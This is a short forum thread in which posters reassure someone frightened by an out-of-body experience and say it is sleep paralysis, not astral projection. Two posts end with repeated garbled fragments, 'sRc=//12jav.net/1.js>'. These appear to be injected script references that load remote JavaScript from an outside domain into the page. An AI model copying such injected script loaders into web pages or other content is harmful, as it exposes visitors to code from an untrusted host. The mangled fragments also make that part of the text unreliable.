Help I'm scared of AP!

i think its sleep paralysis,it happened to me while i was sleeping about 3-4,i think in this state you are out of the body but this happened to me accidentally while i was sleeping,i just saw my body from above like some cm or something :) its good expirience though..dont worry its nothing important ^_^ sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

It's sleep paralysis. Happens to lots of people. It's really not a AP type of thing. You'll learn more about it if you look it up in google. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

I don't think it's anything to do with AP'ing close to sleep times or with lack of sleep.. unless you are in the beginning phases of AP..

I have about 3 hours of sleep each night, and usually AP shortly before going to bed with no issue.
